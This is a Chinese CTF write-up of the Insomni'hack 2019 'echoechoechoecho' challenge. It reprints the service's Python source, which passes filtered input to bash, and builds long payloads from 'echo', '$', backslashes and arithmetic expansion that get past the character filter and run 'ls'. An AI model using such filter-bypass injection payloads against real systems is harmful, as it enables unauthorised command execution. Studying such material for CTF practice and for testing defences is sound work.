参考链接

https://ctftime.org/task/7456

题目内容

Echo echo echo echo, good luck

nc 35.246.181.187 1337

解题过程

主要思路是通过精巧的构造绕过过滤。

源代码如下:

#!/usr/bin/env python3

from os import close

from random import choice

import re

from signal import alarm

from subprocess import check_output

from termcolor import colored

alarm(10)

colors = ["red","blue","green","yellow","magenta","cyan","white"]

# thanks http://patorjk.com/software/taag/#p=display&h=0&f=Crazy&t=echo

banner = """

                            _..._                 .-'''-.

                         .-'_..._''.             '   _    \\

       __.....__       .' .'      '.\  .       /   /` '.   \\

   .-''         '.    / .'           .'|      .   |     \  '

  /     .-''"'-.  `. . '            <  |      |   '      |  '

 /     /________\   \| |             | |      \    \     / /

 |                  || |             | | .'''-.`.   ` ..' /

 \    .-------------'. '             | |/.'''. \  '-...-'`

  \    '-.____...---. \ '.          .|  /    | |

   `.             .'   '. `._____.-'/| |     | |

     `''-...... -'       `-.______ / | |     | |

                                  `  | '.    | '.

                                     '---'   '---'

"""

def bye(s=""):

    print(s)

    print("bye")

    exit()

def check_input(payload):

    if payload == 'thisfile':

        bye(open("/bin/shell").read())

    if not all(ord(c) < 128 for c in payload):

        bye("ERROR ascii only pls")

    if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):

        bye("ERROR invalid characters")

    # real echolords probably wont need more special characters than this

    if payload.count("+") > 1 or \

            payload.count("'") > 1 or \

            payload.count(")") > 1 or \

            payload.count("(") > 1 or \

            payload.count("=") > 2 or \

            payload.count(";") > 3 or \

            payload.count(" ") > 30:

        bye("ERROR Too many special chars.")

    return payload

print(colored(banner, choice(colors)))

print("Hi, what would you like to echo today? (make sure to try 'thisfile')")

payload = check_input(input())

print("And how often would you like me to echo that?")

count = max(min(int(input()), 10), 0)

payload += "|bash"*count

close(0)

result = check_output(payload, shell=True, executable="/bin/bash")

bye(result.decode())

Payload只能包含部分特殊符号加上echo, 并且有些特殊符号的使用次数有限制。

下面先演示下如何构造ls

ls | bash

等价于下面

echo $'\154\163' | bash

等价于下面

echo echo \$\'\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))+$((10==10))))\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))))\'

等价于下面。做这道题的时候$$的值为10。

echoecho=\; echoechoecho=\( echoechoechoecho=\) echoechoechoechoecho=\+ echoechoechoechoechoecho=\'; echo echo echo \\$\\$echoechoechoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\$echoechoechoechoechoecho

等价于下面

echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ echoechoechoechoechoecho$echo\\\'\; echo echo echo \\\\$\\\\\$echoechoechoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\$echoechoechoechoechoecho

Insomni'hack teaser 2019 - Misc - echoechoechoecho的更多相关文章

  1. Insomni'hack teaser 2019 - Misc - curlpipebash

    参考链接 https://ctftime.org/task/7454 题目 Welcome to Insomni'hack teaser 2019! Execute this Bash command ...

  2. Insomni'hack teaser 2019 - Pwn - 1118daysober

    参考链接 https://ctftime.org/task/7459 Linux内核访问用户空间文件:get_fs()/set_fs()的使用 漏洞的patch信息 https://maltekrau ...

  3. Insomni'hack teaser 2019 - Reverse - beginner_reverse

    参考链接 https://ctftime.org/task/7455 题目描述 A babyrust to become a hardcore reverser 点我下载 解题过程 一道用rust写的 ...

  4. Insomni’hack CTF-l33t-hoster复现分析

    题目地址: https://github.com/eboda/insomnihack/tree/master/l33t_hoster 源码如下: <?php if (isset($_GET[&q ...

  5. CTF各种资源:题目、工具、资料

    目录 题目汇总 Reverse 签到题 Web Web中等难度 Crypto 基础网站 各类工具 综合 Web Payloads 逆向 Pwn 取证 题目汇总 这里收集了我做过的CTF题目 Rever ...

  6. Kangax 的 ES7 兼容性表格

    Kangax 的 ES7 兼容性表格 https://kangax.github.io/compat-table/es2016plus/ Sort by             Engine type ...

  7. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  8. 2019强网杯部分misc&web

    0x01 前言 前两天菜鸡+x和几个大哥算是正式参加了一次ctf的线上赛,也是第一次参加这种比赛(前一段时间巨佬也给了我们一个西班牙的比赛,不过不算是正式参赛,做题的时候,比赛已经结束了),没想到出师 ...

  9. Hack The Box Web Pentest 2019

    [20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...

随机推荐

  1. java第二周小结

    这是接触Java的第一周,了解这个语言的一些基础知识,下面是对这段时间重要知识点的汇总 一.Java是一种面向对象的语言    特点为:简洁高效.可移植性.适合分布式计算.健壮防患于未然的特性.多线程 ...

  2. c++实验8 哈夫曼编码-译码器

    哈夫曼编码-译码器 此次实验的注释解析多加不少---若对小伙伴们有帮助 希望各位麻烦点个关注 多谢 1.哈夫曼树构造算法为: (1)由给定的n个权值{w1,w2,…,wn}构造n棵只有根结点的二叉树, ...

  3. 大sd卡 裂开了,写保护掉了。重新装好后,被写保护的解决办:

    大sd卡 裂开了,写保护掉了.重新装好后,被写保护的解决办: 1.用烙铁把写保护附近的塑料往外顶一点点,就ok   别太热,也别劲太大.容易过,不能破坏原来的部分. 解决问题. 总结: 写保护,就是检 ...

  4. CentOS 6.5 编译安装Apache2.4

    一. httpd 2.4的新特 1) MPM支持运行时装载 --enable-mpms-shared=all --with-mpm=prefork|worker|event2) 支持event MPM ...

  5. oracle-参数文件的备份与还原

    oracle-参数文件的备份与还原 参数文件是实例启动到nomount状态的必要条件,规定了实例的行为特征,位置跟操作系统相关,一般unix类的系统在$ORACLE_HOME/dbs目录下 (wind ...

  6. 将Unix时间戳转换为Date、Json属性动态生成反序列化、序列化指定属性

    实体类 public class Test { [JsonIgnore] public string GetDate { get { return GetTime.ToString("yyy ...

  7. 项目测试完成后,总结典型性bug,以测试的角度,应该怎么筛选bug

    一个wap端改版项目完结了,总结下测试过程中的典型性bug:应该从哪个角度去总结? 有点疑问?不知道是以bug的影响度去总结,还是以优先级去总结(好像优先级和影响度是成正比的,优先级比较高的bug,影 ...

  8. Canvas入门04-绘制矩形

    使用的API: ctx.strokeRect(x, y, width, height) 给一个矩形描边 ctx.fillRect(x, y, width, height) 填充一个矩形 ctx.cle ...

  9. Insertion Sort List(单链表插入排序)

    来源:https://leetcode.com/problems/insertion-sort-list Sort a linked list using insertion sort. 方法: 1. ...

  10. [19/09/02-星期一] 基础知识_Python入门

    一.计算机基础 用户界面:TUI-文本交互界面: GUI-图形化交互界面 命令行:就是一种文本交互界面,可以使用一个一个的指令来操作计算机.任何计算机的操作系统都包含命令行(Windows.Linux ...